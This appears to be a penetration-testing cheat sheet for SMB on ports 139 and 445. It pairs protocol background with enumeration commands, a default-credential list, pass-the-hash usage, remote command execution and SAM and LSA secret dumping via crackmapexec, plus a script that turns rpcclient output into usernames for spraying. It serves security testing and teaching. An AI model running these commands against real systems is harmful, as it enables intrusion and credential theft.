# 139, 445 - SMB

## Port 139

Port 139 is referred to as 'NBT over IP' (NetBIOS over TCP/IP).  NetBIOS (Network Basic Input/Output System) is an API plus a set of name, datagram and session services that let hosts on a local area network find each other by name and exchange data.  On TCP port 139 the NetBIOS Session Service carries SMB, so a client must complete a NetBIOS session request before any SMB traffic is sent; the companion name service (137/UDP) and datagram service (138/UDP) are usually found alongside it.

## Port 445

Port 445 is identified as 'SMB over IP': SMB is carried directly over TCP without the NetBIOS session layer, which is what Windows 2000 and later prefer.  SMB stands for Server Message Block.  CIFS (Common Internet File System) is strictly the name of one SMB1 dialect, but the two names are used interchangeably.  As an application-layer network protocol, SMB/CIFS is primarily used to share files, printers and serial ports across a network.

## SMB

The Server Message Block (SMB) protocol regulates access to files, directories and other network resources such as printers and named pipes.  It is used primarily by Windows, where the newer dialects (SMB2/SMB3) keep backward compatibility with older clients; SMB1 is deprecated and disabled by default in current Windows releases, so finding it enabled is itself a finding.  The Samba project offers a free-software implementation of SMB for Linux and Unix systems.

### IPC$ Share

The IPC$ share can be accessed through an anonymous null session (empty username and empty password), which allows interaction with services exposed via named pipes, such as the SAMR, LSARPC and SRVSVC interfaces.  Modern Windows limits what a null session may query (the RestrictAnonymous settings), so a session that connects can still return nothing useful.  `enum4linux` can be used to collect:

* Information on the operating system
* Details on the parent domain
* Compilation of local users and groups
* Information on available SMB shares
* Effective system security policy

```bash
enum4linux -a target-ip
```

## Common Credentials

Default and vendor accounts worth trying; every username in a row is tried against every password candidate in that row.  Check the lockout policy first (for example with `crackmapexec smb <IP> -u '' -p '' --pass-pol`), since each failed attempt counts toward it.

| Username(s) | Password candidates |
| --- | --- |
| (blank) | (blank) |
| guest | (blank) |
| Administrator, admin | (blank), password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |

## List Shares using smbclient

```bash
smbclient -L //<ip>/   # add -N to attempt a null session without a password prompt
```

## Enumerate Users, Groups & Logged On Users

{% code overflow="wrap" %}

```bash
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]

# Anonymous LDAP bind against a domain controller (-H ldap://... replaces the deprecated -h)
ldapsearch -x -H ldap://10.10.10.10 -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" | grep -i samaccountname: | cut -f 2 -d " "

# Typed inside rpcclient, e.g. after: rpcclient -U '' -N 10.10.10.10  (null session)
enumdomusers
enumdomgroups
```

{% endcode %}
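The `enumdomusers` output is what most follow-up steps (spraying, RID brute-force) consume, and the RID in it matters more than the name. As an added example (not code from the original page), the function below parses that output into a clean list with decimal RIDs and flags the well-known ones, so a renamed built-in Administrator (RID 500) or Guest (RID 501) is still recognised. The function names, the constructed sample output and the `TARGET` variable are this example's own.

```sh
#!/bin/sh
# Added example, not code from the original page: turn the `enumdomusers`
# output of rpcclient into a clean user list with decimal RIDs and flag the
# well-known RIDs, so a renamed built-in Administrator (RID 500) or Guest
# (RID 501) is still spotted. Function names and the sample output are this
# example's own.

# Constructed sample of what `rpcclient -U '' -N <IP> -c enumdomusers` prints.
SAMPLE_ENUMDOMUSERS='user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[svc_backup] rid:[0x451]
user:[j.doe] rid:[0x452]'

# rid_users OUTPUT -> one "name<TAB>rid" line per account, with a note for well-known RIDs
rid_users() {
    printf '%s\n' "$1" |
    sed -n 's/^user:\[\(.*\)] rid:\[0x\([0-9a-fA-F]*\)]$/\1|\2/p' |
    while IFS='|' read -r name hex; do
        rid=$((0x$hex))
        note=""
        case $rid in
            500) note=" (built-in Administrator)" ;;
            501) note=" (built-in Guest)" ;;
            502) note=" (krbtgt)" ;;
        esac
        printf '%s\t%s%s\n' "$name" "$rid" "$note"
    done
}

# rid_usernames OUTPUT -> bare usernames, one per line (input for a password spray or a --rid-brute follow-up)
rid_usernames() { rid_users "$1" | cut -f1; }

# Live use (TARGET is an assumed variable):
#   rid_users "$(rpcclient -U '' -N "$TARGET" -c enumdomusers)"
```

RIDs below 1000 are reserved for built-in principals, so the first account with a RID of 1000 or more (0x3e8) is the first one created by the organisation, which is a useful hint when guessing naming conventions.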

## Enumerate Local Users

### Impacket

```bash
# RID cycling over LSARPC (LsarLookupSids); works anonymously when null sessions are allowed
lookupsid.py -no-pass hostname.local
impacket-lookupsid -no-pass hostname.local
```

## Shared Folders Enumeration

Check whether you can access anything you find.  If you don't have credentials, try a null session (empty username and password) and the `guest` account.

### List Shared Folders

{% code overflow="wrap" %}

```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%password]' -L [--pw-nt-hash] //<IP>  # if pwd is omitted, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash

smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<LM>:<NT>" -H <IP> [-P <PORT>] #Pass-the-Hash (smbmap expects LMHASH:NTHASH; use aad3b435b51404eeaad3b435b51404ee for the LM part when you only have the NT hash)
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list

crackmapexec smb <IP> -u '' -p '' --shares #Null user (for the guest account use -u 'guest' -p '')
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Creds
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Pass-the-Hash
```

{% endcode %}

### Connect/List a Shared Folder

{% code overflow="wrap" %}

```bash
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' [--pw-nt-hash] //<IP>/<Folder> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls'  to list recursively with smbclient

#List with smbmap, without folder it lists everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<LM>:<NT>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash (LMHASH:NTHASH order)
```

{% endcode %}

{% code overflow="wrap" %}

```bash
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
```

{% endcode %}

### From Windows Host

#### Powershell

```powershell
# Retrieves SMB shares on local computer
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer
Get-SmbShare -CimSession "<computer name or session object>"
# Retrieves connections established from the local SMB client to the SMB servers.
Get-SmbConnection
```

#### CMD

```batch
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
```

## Mount a Share on Linux

```bash
# Requires cifs-utils; add -o guest for a null/guest session instead of being prompted
mount -t cifs //10.10.10.10/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```

## Download files from a share

```sh
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
```

## Execute Commands

### crackmapexec

crackmapexec can execute commands through any of mmcexec, smbexec, atexec or wmiexec; wmiexec is the default method.  All of them need local administrator rights on the target, which crackmapexec marks with `(Pwn3d!)` when the credentials are checked.

```bash
apt-get install crackmapexec

crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSA secrets from the SECURITY hive (cached domain creds, service account passwords, DPAPI keys)
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get active SMB sessions
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
```
